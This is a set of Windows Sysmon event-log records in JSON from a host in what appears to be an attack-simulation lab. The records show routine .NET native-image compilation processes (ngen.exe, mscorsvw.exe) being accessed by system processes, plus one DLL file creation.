{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7583,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:43.121\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-049D-5F25-0000-0010188A0F00}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:43.121","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-049D-5F25-0000-0010188A0F00}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7584,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:43.121\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-049D-5F25-0000-0010188A0F00}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:43.121","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-049D-5F25-0000-0010188A0F00}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7585,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:43.137\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CF-5F25-0000-0010BAE61000}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:43.137","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CF-5F25-0000-0010BAE61000}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7586,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:43.168\r\nProcessGuid: {A837DB8D-04CF-5F25-0000-0010BAE61000}\r\nProcessId: 3796\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ed4-0\\System.Net.Http.WebRequest.dll\r\nCreationUtcTime: 2020-08-01 05:59:43.168","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:43.168","ProcessGuid":"{A837DB8D-04CF-5F25-0000-0010BAE61000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ed4-0\\System.Net.Http.WebRequest.dll","CreationUtcTime":"2020-08-01 05:59:43.168","EventReceivedTime":"2020-08-01 05:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7587,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:43.200\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04CF-5F25-0000-001045EA1000}\r\nTargetProcessId: 1320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:43.200","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04CF-5F25-0000-001045EA1000}","TargetProcessId":"1320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7588,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:43.200\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CF-5F25-0000-001045EA1000}\r\nTargetProcessId: 1320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:43.200","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CF-5F25-0000-001045EA1000}","TargetProcessId":"1320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7589,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:43.200\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CF-5F25-0000-001045EA1000}\r\nTargetProcessId: 1320\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:43.200","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CF-5F25-0000-001045EA1000}","TargetProcessId":"1320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7590,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:43.231\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0496-5F25-0000-0010D03C0F00}\r\nTargetProcessId: 4328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:43.231","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0496-5F25-0000-0010D03C0F00}","TargetProcessId":"4328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7591,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:43.231\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0496-5F25-0000-0010D03C0F00}\r\nTargetProcessId: 4328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:43.231","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0496-5F25-0000-0010D03C0F00}","TargetProcessId":"4328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
